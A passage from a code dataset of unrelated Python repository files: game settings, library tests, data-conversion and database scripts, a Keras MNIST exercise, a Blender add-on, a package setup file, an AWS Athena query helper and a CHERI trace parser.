72),\n \"card\": (60, 82),\n \"sun\": (60, 60),\n \"projectile\": (20, 20),\n \"zombie\": (72, 124),\n \"plant\": (62, 62),\n \"potatoExp\": (300, 200),\n \"lawnmover\": (56, 48),\n \"choose\": (475, 523),\n \"letsRock\": (158, 40)\n}\n\npads = {\n \"game\": (213, 170),\n \"sun\": (85, 70),\n \"menubar\": (100, 0),\n \"choose\": (23, 141),\n \"play\": (430, 65),\n \"exit\": (748, 535),\n \"cards\": 10,\n}\n","repo_name":"yeya24/PvZc","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8144178139","text":"\"\"\"\n\n Test implementation of customization through init for example\n\n\"\"\"\n\nfrom tests.test_resources import NemoResource\nfrom flask_nemo import Nemo\nfrom MyCapytain.resources.collections.cts import XmlCtsTextMetadata\nfrom lxml import etree\nfrom tests.test_resources import NautilusDummy\n\n\nclass TestCustomizer(NemoResource):\n \"\"\" Test customization appliers\n \"\"\"\n def test_chunker_default(self):\n \"\"\" Test that the chunker default is called and applied\n \"\"\"\n def default(text, reffs):\n self.assertEqual(str(text.urn), \"urn:cts:phi1294.phi002.perseus-lat2\")\n self.assertEqual(reffs, [\"1.pr\"])\n return [(\"1.pr\", \"I PR\")]\n\n nemo = Nemo(chunker={\n \"default\": default\n })\n chunked = nemo.chunk(\n XmlCtsTextMetadata(\n urn=\"urn:cts:phi1294.phi002.perseus-lat2\"\n ),\n [\"1.pr\"]\n )\n self.assertEqual(chunked, [(\"1.pr\", \"I PR\")])\n\n def test_chunker_urn(self):\n \"\"\" Test that the chunker by urn is called and applied\n \"\"\"\n def urn(text, reffs):\n self.assertEqual(str(text.urn), \"urn:cts:phi1294.phi002.perseus-lat2\")\n self.assertEqual(reffs, [\"1.pr\"])\n return [(\"1.pr\", \"I PR\")]\n\n nemo = Nemo(chunker={\n \"default\": lambda x, y: y,\n \"urn:cts:phi1294.phi002.perseus-lat2\": urn\n })\n chunked = nemo.chunk(\n XmlCtsTextMetadata(\n urn=\"urn:cts:phi1294.phi002.perseus-lat2\"\n ),\n [\"1.pr\"]\n )\n self.assertEqual(chunked, [(\"1.pr\", \"I PR\")])\n\n def test_transform_default_function(self):\n \"\"\" Test that the transform default is called and applied when it's a function\n \"\"\"\n urn_given = \"urn:cts:latinLit:phi1294.phi002.perseus-lat2\"\n ref_given = \"1.pr.1\"\n\n def default(work, xml, objectId, subreference=None):\n self.assertEqual(str(work.urn), \"urn:cts:latinLit:phi1294.phi002.perseus-lat2\")\n self.assertEqual(objectId, urn_given, \"Passage URN should be passed to transform\")\n self.assertEqual(subreference, ref_given, \"Passage URN should be passed to transform\")\n self.assertEqual(xml, \"\")\n return \"\"\n\n nemo = Nemo(transform={\n \"default\": default\n })\n transformed = nemo.transform(\n XmlCtsTextMetadata(\n urn=\"urn:cts:latinLit:phi1294.phi002.perseus-lat2\"\n ),\n \"\",\n urn_given,\n ref_given\n )\n self.assertEqual(transformed, \"\")\n\n def test_transform_default_none(self):\n \"\"\" Test that the transform default is called and applied\n \"\"\"\n nemo = Nemo()\n transformed = nemo.transform(\n XmlCtsTextMetadata(\n urn=\"urn:cts:phi1294.phi002.perseus-lat2\"\n ),\n etree.fromstring(\"\"),\n \"urn:cts:latinLit:phi1294.phi002.perseus-lat2:1.pr.1\"\n )\n self.assertEqual(transformed, \"\")\n\n def test_transform_urn_xslt(self):\n \"\"\" Test that the transform default is called and applied\n \"\"\"\n\n nemo = Nemo(transform={\n \"default\": \"tests/test_data/xsl_test.xml\"\n })\n transformed = nemo.transform(\n XmlCtsTextMetadata(\n urn=\"urn:cts:latinLit:phi1294.phi002.perseus-lat2\"\n ),\n etree.fromstring(''),\n objectId=\"urn:cts:latinLit:phi1294.phi002.perseus-lat2\",\n subreference=\"1.pr.1\"\n )\n self.assertEqual(transformed, '',\n \"It should autoclose the tag\"\n )\n\n def test_transform_match(self):\n \"\"\" Test that the transform default is called and applied\n \"\"\"\n\n nemo = Nemo(transform={\n \"default\": lambda x: self.assertEqual(False, True, \"This should not be run\"),\n \"urn:cts:latinLit:phi1294.phi002.perseus-lat2\": \"tests/test_data/xsl_test.xml\"\n })\n transformed = nemo.transform(\n XmlCtsTextMetadata(\n urn=\"urn:cts:latinLit:phi1294.phi002.perseus-lat2\"\n ),\n etree.fromstring(''),\n objectId=\"urn:cts:latinLit:phi1294.phi002.perseus-lat2\",\n subreference=\"1.pr.1\"\n )\n self.assertEqual(transformed, '',\n \"It should autoclose the tag\"\n )\n","repo_name":"Capitains/flask-capitains-nemo","sub_path":"tests/test_customization.py","file_name":"test_customization.py","file_ext":"py","file_size_in_byte":4684,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"25264976281","text":"#how to use : python convertJson.py ../data/filename.json ../upload/filename.json\nimport codecs, json, sys\n\ndata = []\n\nread_file = sys.argv[1]\noutput_file = sys.argv[2]\noutput_file = output_file.split('.json')[0] + \"_\"\n\nwith codecs.open(read_file, 'rU', 'utf-8') as f:\n\tindex = 1\n\tcount = 1\n\tfile_name = output_file + str(index) + \".json\"\n\tprint(file_name)\n\n\tfor line in f:\n\t\tstrr = json.loads(line)\n\t\tstrr = str(strr)\n\t\tdata.append(strr)\n\t\tsp = strr.split(',')\n\t\t\n\t\tetc = \"\"\n\t\tfor i in range(len(sp)):\n\t\t\tsp[i] = str(sp[i])\n\t\t\tif \"LAT\" in sp[i]:\n\t\t\t\tLAT = sp[i].split(':')[1]\n\t\t\telif \"LNG\" in sp[i]:\n\t\t\t\tLNG = sp[i].split(':')[1]\n\t\t\telse:\n\t\t\t\tetc = etc + sp[i]\n\t\t\t\tif i != len(sp) -1:\n\t\t\t\t\tetc = etc + \", \"\n\t\tif LAT != \"\" and LNG != \"\":\n\t\t\tlocation = \"{ location : [\" + LNG + \", \" + LAT+\"],\" + etc\n#\t\t\tlocation = \"{ location : { type: 'Point', coordinates:[\" + LNG + \", \" + LAT+\"]},\" + etc\n\t\t\tlocation = location.replace(\"'\", \"\\\"\")\n\t\t\n\t\twith open(file_name, 'a+') as file:\n\t\t\tfile.write(location+'\\n')\n\t\tif count % 10000 == 0:\n\t\t\tprint(\">\" + 10000*index + \" imported !\")\n\t\t\t\n\t\tif count % 50000 == 0:\n\t\t\tindex = index +1\n\t\t\tfile_name = output_file + str(index) + \".json\"\n\t\t\tprint(file_name)\n\t\tcount = count + 1\n","repo_name":"minkky/2018-KISTI","sub_path":"2018-KISTI(BaseLine)/public/python/convertJson.py","file_name":"convertJson.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2185394984","text":"import sys, copy\r\ninput = sys.stdin.readline\r\n\r\ndef onoff(idx):\r\n if idx == 0:\r\n for i in range(2):\r\n tmp[i] = 1 - tmp[i]\r\n \r\n elif idx == n-1:\r\n for i in range(n-2, n):\r\n tmp[i] = 1 - tmp[i]\r\n else:\r\n for i in range(idx-1, idx+2):\r\n tmp[i] = 1 - tmp[i]\r\n return\r\n\r\nn = int(input())\r\nnow = list(map(int, input().strip()))\r\ntmp = copy.deepcopy(now)\r\nbulb = list(map(int, input().strip()))\r\nans = int(1e9)\r\ncnt = 0\r\n\r\n# 첫 번째 전구 누르지 않고 시작\r\nfor i in range(1, n):\r\n if tmp[i-1] != bulb[i-1]:\r\n cnt += 1\r\n onoff(i)\r\n\r\nif tmp == bulb:\r\n ans = min(ans, cnt)\r\n\r\ncnt = 1\r\ntmp = copy.deepcopy(now)\r\nonoff(0)\r\n# 첫번째 전구를 누르고 시작\r\nfor i in range(1, n):\r\n if tmp[i-1] != bulb[i-1]:\r\n cnt += 1\r\n onoff(i)\r\n\r\nif tmp == bulb:\r\n ans = min(ans, cnt)\r\n\r\nif ans == int(1e9):\r\n print(-1)\r\nelse:\r\n print(ans)","repo_name":"rloldl-c/algorithm","sub_path":"백준/Gold/2138. 전구와 스위치/전구와 스위치.py","file_name":"전구와 스위치.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11026607225","text":"import sys\nimport sqlite3\n\ndb_path = sys.argv[1]\n\nconn = sqlite3.connect(db_path)\ncurs = conn.cursor()\n\ncurs.executescript(\n\"\"\"\nCREATE TEMPORARY TABLE meta_bak(\nres_id INTEGER NOT NULL,\npath TEXT NOT NULL,\nRA REAL,\nDEC REAL,\nFOREIGN KEY (res_id) REFERENCES RESULTS(res_id) ON DELETE CASCADE ON UPDATE CASCADE);\n\n\nINSERT INTO meta_bak SELECT res_id, path, RA, DEC FROM metadata;\n\nDROP TABLE METADATA;\n\nCREATE TABLE METADATA(\nres_id INTEGER NOT NULL,\npath TEXT NOT NULL,\nRA REAL,\nDEC REAL,\nFOREIGN KEY (res_id) REFERENCES RESULTS(res_id) ON DELETE CASCADE ON UPDATE CASCADE);\n\nINSERT INTO METADATA SELECT res_id, path, RA, DEC FROM meta_bak;\nDROP TABLE meta_bak;\nVACUUM;\n\"\"\")\n\nconn.commit()\n\n\n\n\n","repo_name":"istraumit/Payne-Che","sub_path":"DBClean.py","file_name":"DBClean.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31109924012","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDeep Learning Summer Course - Exercise 4\n\n\"\"\"\n\nfrom tensorflow.keras.datasets import mnist\nimport seaborn as sns\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras import models\nfrom tensorflow.keras.utils import to_categorical\nimport matplotlib.pyplot as plt\n\n\n# %%\n\n(train_data, train_labels), (test_data, test_labels) = mnist.load_data()\n\n# %%\n\ntrain_data = train_data.reshape((len(train_data), 28, 28, 1)) / 255\ntest_data = test_data.reshape((len(test_data), 28, 28, 1)) / 255\n\ntrain_labels = to_categorical(train_labels, num_classes=10)\ntest_labels = to_categorical(test_labels, num_classes=10)\n\n\n# %%\n\nseaborn.heatmap(train_data[1000, :, :].reshape((28,28)))\n\n# %%\n\nmodel = models.Sequential()\n\nmodel.add(layers.Conv2D(32, (5, 5), activation='relu', input_shape=(28, 28, 1), data_format='channels_last', name='first_layer',))\nmodel.add(layers.MaxPooling2D((2, 2)))\n# model.add(layers.Conv2D(64, (3, 3), activation='relu', data_format='channels_last'))\n# model.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu', data_format='channels_last'))\nmodel.add(layers.Flatten())\nmodel.add(layers.Dense(64, activation='relu'))\nmodel.add(layers.Dense(10, activation='softmax'))\n\n# %%\n\nmodel.compile(optimizer='adam',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n# %%\n\nhistory = model.fit(train_data, train_labels, epochs=2, validation_data=(test_data,test_labels))\n\n\n# %%\nkernels = model.get_layer(name='first_layer').get_weights()[0][:, :, 0, :]\nsns.heatmap(kernels[:, :, 1])\n\n# %%\n\nlayer_outputs= [layer.output for layer in model.layers]\nactivation_model= models.Model(inputs=model.input, outputs=layer_outputs)\nactivations = activation_model.predict(train_data[10].reshape(1,28,28,1))\n\ndef display_activation(activations, col_s, row_s, act_index):\n activation = activations[act_index]\n activation_index=0\n fig, ax = plt.subplots(row_s, col_s, figsize=(row_s*2.5,col_s*1.5))\n\n for row in range(0,row_s):\n for col in range(0,col_s):\n ax[row][col].imshow(activation[0, :, :, activation_index], cmap='gray')\n activation_index+= 1\n ","repo_name":"micheleberetta98/sdu-deep-learning-2021","sub_path":"day-6/Ex4.py","file_name":"Ex4.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22254868924","text":"#!/usr/bin/env python3\nimport sys\nsys.path.insert(0, sys.path[0]+'/')\nimport bpy\nfrom bpy.props import PointerProperty, CollectionProperty\nfrom .nftGeneratorAddOn import AddOnPanel, MetadataProperties, AttributesProperties, Analyze, Generate\n\nbl_info = {\n \"name\": \"NFT random generator\",\n \"description\": \"Generate assets combinations\",\n \"author\": \"Doudou\",\n \"version\": (1, 0, 0),\n \"blender\": (3, 3, 1),\n \"category\": \"Scene\"\n}\n\naddOnClasses = AddOnPanel, MetadataProperties, AttributesProperties, Analyze, Generate\n\ndef register():\n\tfrom bpy.utils import register_class\n\tfor addOnClass in addOnClasses:\n\t\tregister_class(addOnClass)\n\tbpy.types.Scene.generatorSettings=PointerProperty(type=MetadataProperties)\n\tbpy.types.Scene.traitSettings=CollectionProperty(type=AttributesProperties)\n\ndef unregister():\n\tfrom bpy.utils import unregister_class\n\tfor addOnClass in reversed(addOnClasses):\n\t\tunregister_class(addOnClass)\n\tdel bpy.types.Scene.generatorSettings;\n\tdel bpy.types.Scene.traitSettings\n\nif __name__=='__main__':\n\tregister()\n","repo_name":"rizerkrof/blenderAddOn-nftGenerator","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3253747270","text":"from os import path\nfrom typing import Optional\n\nfrom setuptools import setup\n\nFULLVERSION = \"0.0.13\"\nVERSION = FULLVERSION\n\nwrite_version = True\n\n\ndef write_version_py(filename: Optional[str] = None) -> None:\n cnt = \"\"\"\\\nversion = '%s'\nshort_version = '%s'\n\"\"\"\n if filename is None:\n filename = path.join(path.dirname(__file__), \"geoutils\", \"version.py\")\n\n a = open(filename, \"w\")\n try:\n a.write(cnt % (FULLVERSION, VERSION))\n finally:\n a.close()\n\n\nif write_version:\n write_version_py()\n\n\nwith open(\"README.md\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetup(\n name=\"geoutils\",\n version=FULLVERSION,\n description=\"Analysis and handling of georeferenced rasters and vectors\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://www.github.com/GlacioHack/geoutils/\",\n author=\"The GlacioHack Team\",\n license=\"BSD-3\",\n packages=[\"geoutils\", \"geoutils.raster\"],\n python_requires=\">=3.8\",\n install_requires=[\n \"rasterio\",\n \"geopandas >= 0.12.0\",\n \"pyproj\",\n \"scipy\",\n \"typing-extensions; python_version < '3.8'\",\n \"matplotlib\",\n \"tqdm\",\n ],\n extras_require={\"rioxarray\": [\"rioxarray\"]},\n scripts=[\"bin/geoviewer.py\"],\n zip_safe=False,\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"Operating System :: OS Independent\",\n \"License :: OSI Approved :: BSD License\",\n ],\n)\n","repo_name":"curtis18/geoutils","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"39003876901","text":"import time, csv\n\nfrom cid.utils import get_parameter\nfrom io import StringIO\n\nfrom pkg_resources import resource_string\nfrom string import Template\nimport json\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nclass Athena():\n # Define defaults\n defaults = {\n 'CatalogName': 'AwsDataCatalog',\n 'DatabaseName': 'customer_cur_data',\n 'WorkGroup': 'primary'\n }\n _CatalogName = None\n _DatabaseName = None\n _WorkGroup = None\n ahq_queries = None\n _metadata = dict()\n _resources = dict()\n _client = None\n region: str = None\n\n def __init__(self, session, resources: dict=None): \n self.region = session.region_name\n self._resources = resources\n \n # Athena client\n self._client = session.client('athena', region_name=self.region)\n\n @property\n def client(self):\n return self._client\n\n @property\n def CatalogName(self) -> str:\n \"\"\" Check if AWS Datacalog and Athena database exist \"\"\"\n if not self._CatalogName:\n # Get AWS Glue DataCatalogs\n glue_data_catalogs = [d for d in self.list_data_catalogs() if d['Type'] == 'GLUE']\n if not len(glue_data_catalogs):\n self._status = 'AWS DataCatog of type GLUE not found'\n if len(glue_data_catalogs) == 1:\n self._CatalogName = glue_data_catalogs.pop().get('CatalogName')\n elif len(glue_data_catalogs) > 1:\n # Select default catalog if present\n default_catalog = [d for d in glue_data_catalogs if d['CatalogName'] == self.defaults.get('CatalogName')]\n if not len(default_catalog):\n # Ask user\n\n self._CatalogName = get_parameter(\n param_name='glue-data-catalog',\n message=\"Select AWS DataCatalog to use\",\n choices=glue_data_catalogs\n )\n logger.info(f'Using datacatalog: {self._CatalogName}')\n return self._CatalogName\n\n @CatalogName.setter\n def set_catalog_name(self, catalog):\n self._CatalogName = catalog\n\n @property\n def DatabaseName(self) -> str:\n \"\"\" Check if Athena database exist \"\"\"\n\n if not self._DatabaseName:\n # Get AWS Athena databases\n athena_databases = self.list_databases()\n if not len(athena_databases):\n self._status = 'AWS Athena databases not found'\n print(self._status)\n exit(1)\n if len(athena_databases) == 1:\n self._DatabaseName = athena_databases.pop().get('Name')\n elif len(athena_databases) > 1:\n # Remove empty databases from the list\n for d in athena_databases:\n tables = self.list_table_metadata(DatabaseName=d.get('Name'))\n if not len(tables):\n athena_databases.remove(d)\n # Select default database if present\n default_database = [d for d in athena_databases if d['Name'] == self.defaults.get('DatabaseName')]\n if len(default_database):\n self._DatabaseName = default_database.pop().get('Name')\n else:\n # Ask user\n self._DatabaseName = get_parameter(\n param_name='athena-database',\n message=\"Select AWS Athena database to use\",\n choices=[d['Name'] for d in athena_databases],\n )\n logger.info(f'Using Athena database: {self._DatabaseName}')\n return self._DatabaseName\n\n @DatabaseName.setter\n def DatabaseName(self, database):\n self._DatabaseName = database\n\n @property\n def WorkGroup(self) -> str:\n \"\"\" Select AWS Athena workgroup \"\"\"\n if not self._WorkGroup:\n logger.info('Selecting Athena workgroup...')\n workgroups = self.list_work_groups()\n logger.info(f'Found {len(workgroups)} workgroups: {\", \".join([wg.get(\"Name\") for wg in workgroups])}')\n if len(workgroups) == 1:\n self._WorkGroup = workgroups.pop().get('Name')\n elif len(workgroups) > 1:\n # Select default workgroup if present\n default_workgroup = next(iter([wg.get('Name') for wg in workgroups if wg['Name'] == self.defaults.get('WorkGroup')]), None)\n if default_workgroup: logger.info(f'Found \"{default_workgroup}\" as a default workgroup')\n # Ask user\n self._WorkGroup = get_parameter(\n param_name='athena-workgroup',\n message=\"Select AWS Athena workgroup to use\",\n choices=[d['Name'] for d in workgroups],\n default=default_workgroup\n )\n logger.info(f'Selected workgroup: \"{self._WorkGroup}\"')\n return self._WorkGroup\n\n @WorkGroup.setter\n def WorkGroup(self, name: str):\n self._WorkGroup = name\n logger.info(f'Selected Athena WorkGroup: \"{self._WorkGroup}\"')\n\n def list_data_catalogs(self) -> list:\n return self.client.list_data_catalogs().get('DataCatalogsSummary')\n \n def list_databases(self) -> list:\n return self.client.list_databases(CatalogName=self.CatalogName).get('DatabaseList')\n \n def get_database(self, DatabaseName: str=None) -> bool:\n \"\"\" Check if AWS Datacalog and Athena database exist \"\"\"\n if not DatabaseName:\n DatabaseName=self.DatabaseName\n try:\n self.client.get_database(CatalogName=self.CatalogName, DatabaseName=DatabaseName).get('Database')\n return True\n except Exception as e:\n logger.debug(e, stack_info=True)\n return False\n\n def list_table_metadata(self, DatabaseName: str=None) -> dict:\n params = {\n 'CatalogName': self.CatalogName,\n 'DatabaseName': DatabaseName if DatabaseName else self.DatabaseName\n }\n table_metadata = list()\n try:\n paginator = self.client.get_paginator('list_table_metadata')\n response_iterator = paginator.paginate(**params)\n for page in response_iterator:\n table_metadata.extend(page.get('TableMetadataList'))\n logger.debug(f'Table metadata: {table_metadata}')\n logger.info(f'Found {len(table_metadata)} tables in {DatabaseName if DatabaseName else self.DatabaseName}')\n except Exception as e:\n logger.error(f'Failed to list tables in {DatabaseName if DatabaseName else self.DatabaseName}')\n logger.error(e)\n \n return table_metadata\n\n def list_work_groups(self) -> list:\n \"\"\" List AWS Athena workgroups \"\"\"\n result = self.client.list_work_groups()\n logger.debug(f'Workgroups: {result.get(\"WorkGroups\")}')\n return result.get('WorkGroups')\n\n def get_table_metadata(self, TableName: str) -> dict:\n table_metadata = self._metadata.get(TableName)\n params = {\n 'CatalogName': self.CatalogName,\n 'DatabaseName': self.DatabaseName,\n 'TableName': TableName\n }\n if not table_metadata:\n table_metadata = self.client.get_table_metadata(**params).get('TableMetadata')\n self._metadata.update({TableName: table_metadata})\n\n return table_metadata\n\n\n def execute_query(self, sql_query, sleep_duration=1, database: str=None, catalog: str=None, fail: bool=True) -> str:\n \"\"\" Executes an AWS Athena Query \"\"\"\n\n # Set execution context\n execution_context = {\n 'Database': database or self.DatabaseName,\n 'Catalog': catalog or self.CatalogName,\n }\n\n try:\n # Start Athena query\n response = self.client.start_query_execution(\n QueryString=sql_query, \n QueryExecutionContext=execution_context, \n WorkGroup=self.WorkGroup\n )\n\n # Get Query ID\n query_id = response.get('QueryExecutionId')\n\n # Get Query Status\n query_status = self.client.get_query_execution(QueryExecutionId=query_id)\n except self.client.exceptions.InvalidRequestException as e:\n logger.error(f'InvalidRequestException: {e}')\n exit(1)\n except Exception as e:\n logger.error('Athena query failed: {}'.format(e))\n logger.error('Full query: {}'.format(sql_query))\n exit(1)\n\n current_status = query_status['QueryExecution']['Status']['State']\n\n # Poll for the current status of query as long as its not finished\n while current_status in ['SUBMITTED', 'RUNNING', 'QUEUED']:\n response = self.client.get_query_execution(QueryExecutionId=query_id)\n current_status = response['QueryExecution']['Status']['State']\n\n # Sleep before polling again\n time.sleep(sleep_duration)\n\n # Return result, either positive or negative\n if (current_status == \"SUCCEEDED\"):\n return query_id\n elif not fail:\n return False\n else:\n failure_reason = response['QueryExecution']['Status']['StateChangeReason']\n logger.error('Athena query failed: {}'.format(failure_reason))\n logger.error(f'Failure reason: {failure_reason}')\n logger.info('Full query: {}'.format(sql_query))\n exit(1)\n\n def get_query_results(self, query_id):\n return self.client.get_query_results(QueryExecutionId=query_id)\n \n def get_query_execution(self, query_id):\n return self.client.get_query_execution(QueryExecutionId=query_id)\n\n def parse_response_as_list(self, response, include_header=False):\n data = list()\n\n # Get results rows, either with or without the header row\n rows = response['ResultSet']['Rows'] if include_header else response['ResultSet']['Rows'][1:]\n\n for row in rows:\n for r in row['Data']:\n data.append(r['VarCharValue'] if 'VarCharValue' in r else '')\n\n return data\n\n def query_results_to_csv(self, query_id, return_header=False):\n # Get query results\n response = self.client.get_query_results(QueryExecutionId=query_id)\n\n # Get results rows, either with or without the header row\n rows = response['ResultSet']['Rows'] if return_header else response['ResultSet']['Rows'][1:]\n\n if rows:\n # Write rows to StringIO in CSV format\n buf = StringIO()\n csv_writer = csv.writer(buf, delimiter=',')\n\n for row in rows:\n csv_writer.writerow([x['VarCharValue'] if 'VarCharValue' in x else None for x in row['Data']])\n\n # Strip whitespaces from CSVified string and return it\n return buf.getvalue().rstrip('\\n')\n else:\n return None\n\n def show_columns(self, table_name):\n sql_query = f'SHOW COLUMNS in {table_name}'\n query_id = self.execute_query(sql_query=sql_query)\n\n describe = self.query_results_to_csv(query_id).split('\\n')\n\n # Athena is weird.. Remove whitespaces.\n result = [elem.rstrip() for elem in describe]\n\n return result\n\n def parse_selected_tables(self, month_list):\n d = {}\n\n for month in month_list:\n split = month.split('_')\n\n payer = split[1]\n year = split[2][:4]\n month = split[2][4:]\n\n if payer in d:\n d[payer].append((year, month))\n else:\n d[payer] = list()\n d[payer].append((year, month))\n \n return d\n\n # AHQ functions\n def execute_ahq(self, query_id, **kwargs) -> list:\n \"\"\" Execute Athena Query by name \"\"\"\n # Load query\n query = self.get_ahq(query_id, **kwargs)\n # Execute query\n execution_id = self.execute_query(query)\n results = self.get_query_results(execution_id)\n # Return results as list\n return self.parse_response_as_list(results)\n\n\n def get_ahq(self, query_id, **kwargs) -> str:\n \"\"\" Returns a fully compiled AHQ \"\"\"\n # Query path\n query_file = self.get_ahqs().get(query_id).get('File')\n\n template = Template(resource_string(__name__, f'../queries/{query_file}').decode('utf-8'))\n\n # Fill in TPLs\n columns_tpl = dict()\n columns_tpl.update(**kwargs)\n compiled_query = template.safe_substitute(columns_tpl)\n\n return compiled_query\n\n\n def get_ahqs(self) -> dict:\n \"\"\" Return a list of all availiable AHQs \"\"\"\n \n if not self.ahq_queries: \n # Load queries\n queries_files = resource_string(__name__, '../queries/ahq-queries.json')\n self.ahq_queries = json.loads(queries_files).get('query_templates')\n\n return self.ahq_queries\n\n\n def discover_views(self, views: dict={}) -> None:\n for view_name in views:\n try:\n self.get_table_metadata(TableName=view_name)\n except self.client.exceptions.MetadataException:\n pass\n\n\n def wait_for_view(self, view_name: str, poll_interval=1, timeout=60) -> None:\n deadline = time.time() + timeout\n while time.time() <= deadline:\n self.discover_views([view_name])\n if view_name in self._metadata.keys():\n logger.info(f'view {view_name} exists')\n return True\n else:\n time.sleep(poll_interval)\n else:\n logger.info(f'view {view_name} exists')\n return False\n\n\n def delete_table(self, name: str, catalog: str=None, database: str=None):\n if get_parameter(\n param_name=f'confirm-{name}',\n message=f'Delete Athena table {name}?',\n choices=['yes', 'no'],\n default='no') != 'yes':\n return False\n\n try:\n res = self.execute_query(\n f'DROP TABLE IF EXISTS {name};',\n catalog=catalog,\n database=database,\n fail=False\n )\n except Exception as exc:\n logger.debug(exc, stack_info=True)\n logger.info(f'Table {name} cannot be deleted: {exc}')\n return False\n else:\n if name in self._metadata: del self._metadata[name]\n logger.info(f'Table {name} deleted')\n return True\n\n def delete_view(self, name: str, catalog: str=None, database: str=None):\n if get_parameter(\n param_name=f'confirm-{name}',\n message=f'Delete Athena view {name}?',\n choices=['yes', 'no'],\n default='no') != 'yes':\n return False\n\n try:\n res = self.execute_query(\n f'DROP VIEW IF EXISTS {name};',\n catalog=catalog,\n database=database,\n fail=False\n )\n except Exception as exc:\n logger.debug(exc, stack_info=True)\n logger.info(f'View {name} cannot be deleted: {exc}')\n return False\n else:\n if name in self._metadata: del self._metadata[name]\n logger.info(f'View {name} deleted')\n return True\n","repo_name":"grinco/aws-cudos-framework-deployment","sub_path":"cid/helpers/athena.py","file_name":"athena.py","file_ext":"py","file_size_in_byte":15412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"374847504","text":"alpha=0.1\nbeta=0.1\nfile=open(\"data/MED.REL\",\"r\")\ngt=file.readlines()\ndic={}\nfor i in gt:\n query=int(i.split(\" \")[0])\n doc=int(i.split(\" \")[2])\n if query not in dic.keys():\n dic[query]=[doc]\n else:\n dic[query].append(doc)\n \nprint (dic)\n \n","repo_name":"Shashwat777/Assignment-3","sub_path":"src/Problem_2/me.py","file_name":"me.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23403265004","text":"import logging\nimport sys\nimport tempfile\nimport shutil\n\nfrom functools import reduce\nfrom collections import deque\nfrom cheriplot.core import (\n MultiprocessCallbackParser, BaseTraceTaskDriver, ConfigurableComponent,\n Option, NestedConfig, interactive_tool, option_range_validator,\n any_int_validator)\nfrom cheriplot.vmmap import VMMapFileParser\nfrom cheriplot.provenance import CheriCap\nfrom cheriplot.dbg.symbols import SymReader\n\nlogger = logging.getLogger(__name__)\n\nclass TraceDumpParser(MultiprocessCallbackParser, ConfigurableComponent):\n \"\"\"Parser that performs filtering and search operations on a trace\"\"\"\n\n range_format_help = \"Accept a range in the form -, -, \"\\\n \"- or \"\n\n info = Option(action=\"store_true\", help=\"Print trace info and exit\")\n start = Option(\"-s\", type=int, default=0, help=\"Start offset in the trace\")\n end = Option(\"-e\", type=int, default=None, help=\"Stop offset in the trace\")\n outfile = Option(\n \"-o\",\n type=str,\n default=None,\n help=\"Write output to the given file\")\n show_regs = Option(\"-r\", action=\"store_true\", help=\"Dump register content\")\n instr = Option(default=None, help=\"Find instruction occurrences\")\n reg = Option(\n default=None,\n help=\"Show the instructions that use the given register\")\n pc = Option(\n type=option_range_validator,\n default=None,\n help=\"Find instructions with PC in given range. \" + range_format_help)\n mem = Option(\n type=option_range_validator,\n default=None,\n help=\"Show the instructions that use the given memory address. \" +\n range_format_help)\n exception = Option(\n default=None,\n help=\"Show the instructions that raise a given exception. \"\n \"Accept the exception number in [0-30] or 'any'.\")\n syscall = Option(\n default=None,\n type=int,\n help=\"Show the syscalls with given code\")\n nop = Option(\n type=any_int_validator,\n default=None,\n help=\"Show canonical nops with given code\")\n perms = Option(\n type=any_int_validator,\n default=None,\n help=\"Find instructions that touch capabilities\"\n \" with the given permission bits set\")\n after = Option(\n \"-A\",\n type=int,\n default=0,\n help=\"Dump n instructions after a matching one\")\n before = Option(\n \"-B\",\n type=int,\n default=0,\n help=\"Dump n instructions before a matching one\")\n match_any = Option(\n action=\"store_true\",\n help=\"Return a trace entry when matches any of the conditions \"\n \"instead of all\")\n\n def __init__(self, **kwargs):\n \"\"\"\n This parser filters the trace according to a set of match\n conditions. Multiple match conditions can be used at the same time\n to refine or widen the filter.\n\n :param sym_reader: symbol reader helper, used to extract\n symbol information\n \"\"\"\n sym_reader = kwargs.pop(\"sym_reader\")\n assert \"trace_path\" in kwargs, \"trace_path argument is required!\"\n if \"keyframe_file\" not in kwargs:\n kwargs[\"keyframe_file\"] = \"{}.kf\".format(kwargs[\"trace_path\"])\n super().__init__(**kwargs)\n\n if not self.is_worker:\n # update kwargs used to create workers\n self.kwargs[\"sym_reader\"] = sym_reader\n\n self._entry_history = deque([], self.config.before)\n \"\"\"FIFO instructions that may be shown if a match is found\"\"\"\n\n self._dump_next = 0\n \"\"\"The remaining number of instructions to dump after a match\"\"\"\n\n self._kernel_mode = False\n \"\"\"Keep track of kernel-userspace transitions\"\"\"\n\n self.sym_reader = 